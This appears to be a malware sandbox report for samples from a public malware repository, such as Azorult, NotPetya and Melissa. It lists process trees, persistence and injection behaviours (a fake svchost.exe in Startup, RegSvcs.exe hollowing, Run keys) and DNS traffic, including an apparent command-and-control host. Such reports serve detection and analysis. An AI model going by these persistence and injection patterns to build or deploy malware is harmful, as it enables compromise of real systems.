"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5572

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6064
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4792
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6060

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\MadMan.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2716

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1556

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2820

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\rogues\SpySheriff.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4128

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\rogues\SpySheriff.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:240

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\rogues\AdwereCleaner.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2112

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6064
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5808
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4820

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\rogues\AdwereCleaner.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5364

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Worm\Heap41A.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Worm\HeadTail.vbs"
1⤵
- Modifies visiblity of hidden/system files in Explorer
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:3928

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Worm\Fagot.a.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5196

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Pony\metrofax.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:136

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
1⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:6108

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Loveware.txt
1⤵
PID:1912

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Rahack\Rahack.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3404

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2684
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2892
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4856

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Botnets\FritzFrog\d1e82d4a37959a9e6b661e31b8c8c6d2813c93ac92508a2771b2491b04ea2485.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5556

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1032
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Botnets\FritzFrog\3205603282a636979a55aa1e1be518cd3adcbbe491745d996ceb4b5a4dece0c5"
  2⤵
  PID:5036

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
PID:436
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:3372
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:2920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Bolbi.vbs"
1⤵
PID:3064
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Administrator.vbs"
  2⤵
  PID:3980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Carewmr.vbs"
1⤵
PID:3804
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Administrator.vbs"
  2⤵
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.avp.ru/
  2⤵
  PID:1724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c6d3cb8,0x7ffd0c6d3cc8,0x7ffd0c6d3cd8
    3⤵
    PID:4132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
    3⤵
    PID:5324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
    3⤵
    PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
    3⤵
    PID:1076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
    3⤵
    PID:3416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
    3⤵
    PID:3688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
    3⤵
    PID:5204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    PID:5668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,5266590762089840923,2572986595587399450,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
    3⤵
    PID:2460

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5912

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:828

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\HMBlocker.exe"
1⤵
PID:2404

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Offiz.js"
1⤵
PID:3412

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
PID:5896
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:5440
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:2180

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\NotPetya.exe"
1⤵
PID:3184

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3840
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\PetrWrap"
  2⤵
  PID:2340

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
PID:4228
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:1820
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:4876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5484
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\PetrWrap"
  2⤵
  PID:1928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\PetrWrap
    3⤵
    PID:2968
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bf11c39-33c1-495d-9da1-a093bc9bed92} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" gpu
      4⤵
      PID:5832
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32179efb-98e0-4d17-a548-5fdf2f4bfd71} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" socket
      4⤵
      PID:2496
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3248 -childID 1 -isForBrowser -prefsHandle 3228 -prefMapHandle 3224 -prefsLen 28551 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {782c22f3-b546-431f-b602-16cfc064a077} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
      4⤵
      PID:1376
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2844 -childID 2 -isForBrowser -prefsHandle 3116 -prefMapHandle 3092 -prefsLen 32900 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c07fcff6-eddb-43ff-b5b2-404833f8ee32} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
      4⤵
      PID:2196
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 3080 -prefMapHandle 4132 -prefsLen 32900 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d23dd5a-ea56-493e-a8c4-45b68f0691a9} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" utility
      4⤵
      PID:2492

Network

DNS

github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

ocsp.digicert.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

cac-ocsp.digicert.com.edgekey.net

cac-ocsp.digicert.com.edgekey.net

IN CNAME

e3913.cd.akamaiedge.net

e3913.cd.akamaiedge.net

IN A

104.78.173.167
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-3.ukwest.cloudapp.azure.com

prod-agic-uw-3.ukwest.cloudapp.azure.com

IN A

51.11.108.188
DNS

215.156.26.20.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

avatars.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN A

Response

avatars.githubusercontent.com

IN A

185.199.111.133

avatars.githubusercontent.com

IN A

185.199.109.133

avatars.githubusercontent.com

IN A

185.199.110.133

avatars.githubusercontent.com

IN A

185.199.108.133
DNS

203.197.79.204.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

203.197.79.204.in-addr.arpa

IN PTR

Response

203.197.79.204.in-addr.arpa

IN PTR

a-0003a-msedgenet
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
DNS

216.156.26.20.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

216.156.26.20.in-addr.arpa

IN PTR

Response
DNS

github-cloud.s3.amazonaws.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN A

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

3.5.28.198

s3-w.us-east-1.amazonaws.com

IN A

52.217.142.81

s3-w.us-east-1.amazonaws.com

IN A

54.231.224.25

s3-w.us-east-1.amazonaws.com

IN A

3.5.27.25

s3-w.us-east-1.amazonaws.com

IN A

52.217.123.1

s3-w.us-east-1.amazonaws.com

IN A

52.216.36.209

s3-w.us-east-1.amazonaws.com

IN A

16.15.177.158

s3-w.us-east-1.amazonaws.com

IN A

16.15.177.155
DNS

www.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

www-www.bing.com.trafficmanager.net

www-www.bing.com.trafficmanager.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.135.42

e86303.dscx.akamaiedge.net

IN A

95.101.143.201
DNS

33.135.221.88.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

33.135.221.88.in-addr.arpa

IN PTR

Response

33.135.221.88.in-addr.arpa

IN PTR

a88-221-135-33deploystaticakamaitechnologiescom
DNS

133.32.126.40.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

133.32.126.40.in-addr.arpa

IN PTR

Response
DNS

131.72.42.20.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

131.72.42.20.in-addr.arpa

IN PTR

Response
DNS

nickman12-46565.portmap.io

msedge.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

drive.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

142.250.200.46
DNS

drive.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

142.250.200.46
GET

https://github.com/Da2dalus/The-MALWARE-Repo

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:04 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"bf20e29aae761a3f06c6b53b76da857b"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
